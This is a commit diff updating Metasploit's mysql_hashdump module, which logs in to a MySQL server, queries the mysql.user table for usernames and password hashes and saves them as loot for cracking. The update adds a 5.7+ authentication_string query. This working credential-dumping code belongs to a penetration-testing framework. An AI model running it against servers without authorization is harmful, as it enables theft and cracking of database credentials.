Land rapid7#9525, Update mysql_hashdump for MySQL 5.7 and above

jmartin-tech · Feb 12, 2018 · 32bd516 · 32bd516
1 parent 656eb11
commit 32bd516
Showing 1 changed file with 33 additions and 32 deletions.
diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb
@@ -12,70 +12,76 @@ class MetasploitModule < Msf::Auxiliary
   def initialize
     super(
       'Name'           => 'MYSQL Password Hashdump',
-      'Description'    => %Q{
+      'Description'    => %(
           This module extracts the usernames and encrypted password
         hashes from a MySQL server and stores them for later cracking.
-      },
+      ),
       'Author'         => ['theLightCosine'],
       'License'        => MSF_LICENSE
     )
   end
 
   def run_host(ip)
 
-    if (not mysql_login_datastore)
-      return
-    end
+    return unless mysql_login_datastore
 
     service_data = {
-        address: ip,
-        port: rport,
-        service_name: 'mysql',
-        protocol: 'tcp',
-        workspace_id: myworkspace_id
+      address: ip,
+      port: rport,
+      service_name: 'mysql',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
     }
 
     credential_data = {
-        module_fullname: self.fullname,
-        origin_type: :service,
-        private_data: datastore['PASSWORD'],
-        private_type: :password,
-        username: datastore['USERNAME']
+      module_fullname: self.fullname,
+      origin_type: :service,
+      private_data: datastore['PASSWORD'],
+      private_type: :password,
+      username: datastore['USERNAME']
     }
 
     credential_data.merge!(service_data)
 
     credential_core = create_credential(credential_data)
 
     login_data = {
-        core: credential_core,
-        last_attempted_at: DateTime.now,
-        status: Metasploit::Model::Login::Status::SUCCESSFUL
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
     }
     login_data.merge!(service_data)
 
     create_credential_login(login_data)
 
-    #Grabs the username and password hashes and stores them as loot
-    res = mysql_query("SELECT user,password from mysql.user")
+    # Grab the username and password hashes and store them as loot
+    version = mysql_get_variable("@@version")
+
+    # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
+    if version[0..2].to_f > 5.6
+      res = mysql_query("SELECT user,authentication_string from mysql.user")
+    else
+      res = mysql_query("SELECT user,password from mysql.user")
+    end
+
     if res.nil?
       print_error("There was an error reading the MySQL User Table")
       return
     end
 
     service_data = {
-      address: ::Rex::Socket.getaddress(rhost,true),
+      address: ::Rex::Socket.getaddress(rhost, true),
       port: rport,
       service_name: 'mysql',
       protocol: 'tcp',
       workspace_id: myworkspace_id
     }
 
     credential_data = {
-        origin_type: :service,
-        jtr_format: 'mysql,mysql-sha1',
-        module_fullname: self.fullname,
-        private_type: :nonreplayable_hash
+      origin_type: :service,
+      jtr_format: 'mysql,mysql-sha1',
+      module_fullname: self.fullname,
+      private_type: :nonreplayable_hash
     }
 
     credential_data.merge!(service_data)
@@ -87,17 +93,12 @@ def run_host(ip)
         print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
         credential_core = create_credential(credential_data)
         login_data = {
-            core: credential_core,
-            status: Metasploit::Model::Login::Status::UNTRIED
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
         }
         login_data.merge!(service_data)
         create_credential_login(login_data)
       end
     end
-
   end
-
-
-
-
 end